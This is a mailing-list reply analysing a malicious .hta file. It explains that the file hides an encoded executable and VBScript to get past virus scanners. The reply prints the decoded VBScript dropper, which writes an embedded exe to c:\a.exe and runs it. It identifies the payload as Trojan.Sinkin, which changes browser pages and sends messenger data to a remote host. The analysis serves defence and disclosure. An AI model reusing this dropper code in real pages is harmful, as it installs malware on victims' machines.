Re: [Full-Disclosure] .hta virus analysys

[Jelmer]

.hta files is a proprietary concept, and only works in conjunction with Internet Explorer (specifically version 5 and above). basicly its much like a .html except it has no security restrictions   there are 2 things being encoded in the script you send an executable in a string called m and a piece of vbscript code in a string called c they seem to be encoded to trick virusscanners into letting them pass decoding the vbscript code we get  <script language="VBScript"> Dim fs, dr, f Set fs = CreateObject("Scripting.FileSystemObject") f = "c:\a.exe" Set dr = fs.CreateTextFile(f, True) dr.Writeline m dr.close Set shell=CreateObject("WScript.Shell") shell.run(f) self.close </SCRIPT> which basicly says, get the embedded .exe file store it in c:\a.exe then execute it the exe being dropped is identified by norton as being Trojan.Sinkin   <quote>   Trojan.Sinkin is a Trojan Horse that changes the Internet Explorer start and search pages, and sends   AOL Instant Messenger information to a remote host.   This Trojan may also display advertisements when the user is browsing the Web </quote>   now you know ----- Original Message ----- From: Jim Duggan To: [EMAIL PROTECTED] Sent: Thursday, November 20, 2003 2:31 AM Subject: [Full-Disclosure] .hta virus analysys A friend contracted this .hta that seems to edit your profile with a link to itself, http://www.talkstocks.net/ attached is the hta file it attempts to run.  Its looks to be encoded, which is something i dont know much about but im sure most people on this list will have no problem reading it, just wondering what it does. Any help appreciated Thx Jason